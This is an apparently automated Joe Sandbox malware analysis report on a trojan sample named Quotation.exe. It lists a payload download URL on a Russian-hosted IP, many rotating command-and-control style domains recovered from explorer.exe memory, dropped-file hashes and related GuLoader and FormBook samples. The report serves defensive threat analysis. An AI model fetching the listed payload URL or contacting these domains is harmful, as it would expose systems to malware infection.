      http://www.yaanincma.store0%Avira URL Cloudsafe
      http://www.alkak.cam/hy29/0%Avira URL Cloudsafe
      http://www.owboyaero.net/hy29/0%Avira URL Cloudsafe
      http://www.zrk148.ink0%Avira URL Cloudsafe
      http://www.nline-advertising-18349.bond/hy29/0%Avira URL Cloudsafe
      http://www.owboyaero.net0%Avira URL Cloudsafe
      http://www.unnify.net0%Avira URL Cloudsafe
      http://www.84jys301.top0%Avira URL Cloudsafe
      http://www.ulunguwethu.storeReferer:0%Avira URL Cloudsafe
      http://www.rbis.site/hy29/www.alkak.cam0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.alkak.cam
      		unknown
      		unknowntrue
        		unknown
        www.rbis.site
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://94.141.120.137/qVMezflLJCc194.bintrue
          • Avira URL Cloud: malware
          		unknown
          www.84jys301.top/hy29/true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.zrk148.inkReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://word.office.comonexplorer.exe, 00000005.00000000.2523519321.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
            		high
            http://www.ulunguwethu.store/hy29/www.n6n.xyzexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.owboyaero.netReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.unnify.net/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.alkak.camReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.eifeigou.topReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.ylosnackpark.online/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.nline-advertising-18349.bondexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://powerpoint.office.comcemberexplorer.exe, 00000005.00000000.2527576116.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3264925977.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
              		high
              http://www.rbis.siteexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.ylosnackpark.onlineexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.eifeigou.top/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://excel.office.comexplorer.exe, 00000005.00000002.3262974306.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094424197.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094747500.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                http://www.84jys301.topReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.rbis.site/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ylosnackpark.onlineReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.microexplorer.exe, 00000005.00000000.2522347519.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3261806381.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2523095396.0000000008890000.00000002.00000001.00040000.00000000.sdmpfalse
                  		high
                  http://www.dfg3n489.cyou/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://94.141.120.137/Quotation.exe, 00000003.00000002.2580312950.0000000003E24000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ulbcenter.shop/hy29/www.ulunguwethu.storeexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.dfg3n489.cyouReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.dfg3n489.cyouexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.yaanincma.store/hy29/concgexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.nline-advertising-18349.bondReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.n6n.xyz/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.eifeigou.topexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdQuotation.exe, 00000003.00000001.2393775567.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                    		high
                    http://www.veriox.xyzReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.unnify.netReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.ulunguwethu.storeexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.84jys301.top/hy29/www.ustdoit.storeexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      		high
                      http://www.ylosnackpark.online/hy29/www.eifeigou.topexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.n6n.xyz/hy29/www.nline-advertising-18349.bondexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.owboyaero.net/hy29/www.84jys301.topexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.ulbcenter.shopReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.veriox.xyz/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.zrk148.ink/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000005.00000000.2527576116.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3264925977.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://94.141.120.137/s$#&Quotation.exe, 00000003.00000002.2580312950.0000000003E24000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.dfg3n489.cyou/hy29/www.yaanincma.storeexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ustdoit.store/hy29/www.dfg3n489.cyouexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.alkak.cam/hy29/www.ulbcenter.shopexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ulbcenter.shopexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://wns.windows.com/)sexplorer.exe, 00000005.00000000.2523519321.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.n6n.xyzReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.yaanincma.store/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.yaanincma.storeReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.n6n.xyzexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ustdoit.storeexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://94.141.120.137/qVMezflLJCc194.binsQuotation.exe, 00000003.00000002.2580312950.0000000003DE8000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.nline-advertising-18349.bond/hy29/www.zrk148.inkexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ftp.ftp://ftp.gopher.Quotation.exe, 00000003.00000001.2393775567.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                            		high
                            http://www.alkak.camexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nsis.sf.net/NSIS_ErrorErrorQuotation.exefalse
                              		high
                              http://www.veriox.xyz/hy29/www.owboyaero.netexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ulunguwethu.store/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.zrk148.ink/hy29/www.unnify.netexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ulbcenter.shop/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.eifeigou.top/hy29/www.veriox.xyzexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://outlook.comexplorer.exe, 00000005.00000003.3094424197.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3094747500.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262974306.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.ustdoit.store/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.84jys301.top/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ustdoit.storeReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.veriox.xyzexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.unnify.net/hy29/www.ylosnackpark.onlineexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.yaanincma.storeexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.rbis.siteReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.zrk148.inkexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.alkak.cam/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://android.notify.windows.com/iOSexplorer.exe, 00000005.00000002.3259903697.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2521577979.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.nline-advertising-18349.bond/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.unnify.netexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdQuotation.exe, 00000003.00000001.2393775567.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                    		high
                                    http://www.owboyaero.netexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.owboyaero.net/hy29/explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.msn.com/explorer.exe, 00000005.00000002.3262290605.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.vexplorer.exe, 00000005.00000002.3257532764.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2519828963.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.84jys301.topexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.ulunguwethu.storeReferer:explorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.rbis.site/hy29/www.alkak.camexplorer.exe, 00000005.00000003.3094316811.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3266011804.000000000C8F0000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        94.141.120.137
                                        		unknownRussian Federation
                                        		43429UNITLINE_RST_NET1RostovnaDonuRUfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1554157
                                        Start date and time:2024-11-12 07:34:10 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 9s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Quotation.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@8/9@2/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 93%
                                        • Number of executed functions: 83
                                        • Number of non-executed functions: 285
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        01:36:00API Interceptor558x Sleep call for process: explorer.exe modified
                                        01:36:34API Interceptor50x Sleep call for process: colorcpl.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        UNITLINE_RST_NET1RostovnaDonuRUQUOTATION#09678.exeGet hashmaliciousRedLineBrowse
                                        • 94.141.120.6
                                        hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 94.141.123.127
                                        hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 94.141.123.127
                                        hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                        • 94.141.123.127
                                        hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 94.141.123.127
                                        hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 94.141.123.127
                                        hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 94.141.123.127
                                        hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 94.141.123.127
                                        hidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 94.141.123.127
                                        hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        • 94.141.123.127

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dllCERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                            SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                              D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                  UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    UMOWA_PD.BAT.exeGet hashmaliciousGuLoaderBrowse
                                                      Payment_Advice.1.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        Payment_Advice..exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          Payment_Advice..exeGet hashmaliciousGuLoaderBrowse

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):12288
                                                            Entropy (8bit):5.805604762622714
                                                            Encrypted:false
                                                            SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                            MD5:4ADD245D4BA34B04F213409BFE504C07
                                                            SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                            SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                            SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                            Malicious:false
